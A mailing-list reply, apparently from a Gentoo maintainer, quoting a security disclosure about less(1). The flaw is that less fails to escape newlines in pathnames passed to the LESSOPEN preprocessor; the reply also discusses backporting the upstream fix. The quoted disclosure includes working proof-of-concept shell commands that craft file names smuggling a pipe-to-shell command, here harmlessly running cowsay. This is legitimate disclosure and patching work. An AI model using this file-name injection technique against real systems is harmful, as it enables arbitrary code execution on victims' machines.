Jakub Wilk <jw...@jwilk.net> writes: > less(1) does not correctly escape newlines in pathnames when > constructing command line of the input preprocessor. If a user ran > less(1) on files with untrusted names, this could result in execution > of arbitrary code. > > The input preprocessor is enabled by the LESSOPEN environment variable. > But if you didn't set it, don't worry, because zless(1) (or xzless(1), > or zstdless(1)) sets it for you: > > $ echo 'cowsay pwned' > './\' && touch "$(printf '\n|sh')" > $ zless ./* > _______ > < pwned > > ------- > \ ^__^ > \ (oo)\_______ > (__)\ )\/\ > ||----w | > || || > ./ > |sh (file 1 of 2) (END) - Next: ./\ > > On Ubuntu systems, $LESSOPEN is set in ~/.bashrc by default, so the > bug can be exploited even without the wrapper: >
Unfortunately, it looks like we're the same in Gentoo. > $ mkdir m "$(printf '\n|m')" && touch "$(printf '\n|m/oo')" && echo > 'cowsay pwned' > m/oo && chmod +x m/oo > $ less ./*/* > _______ > < pwned > > ------- > \ ^__^ > \ (oo)\_______ > (__)\ )\/\ > ||----w | > || || > ./ > |m/oo (file 1 of 2) (END) - Next: ./m/oo > > > Upstream fix: > https://github.com/gwsw/less/commit/007521ac3c95bc76 Thanks. Any idea if upstream plan to backport it? It doesn't apply cleanly I think to the last release 643 (653 is a beta) but I'll try do it now.
signature.asc
Description: PGP signature
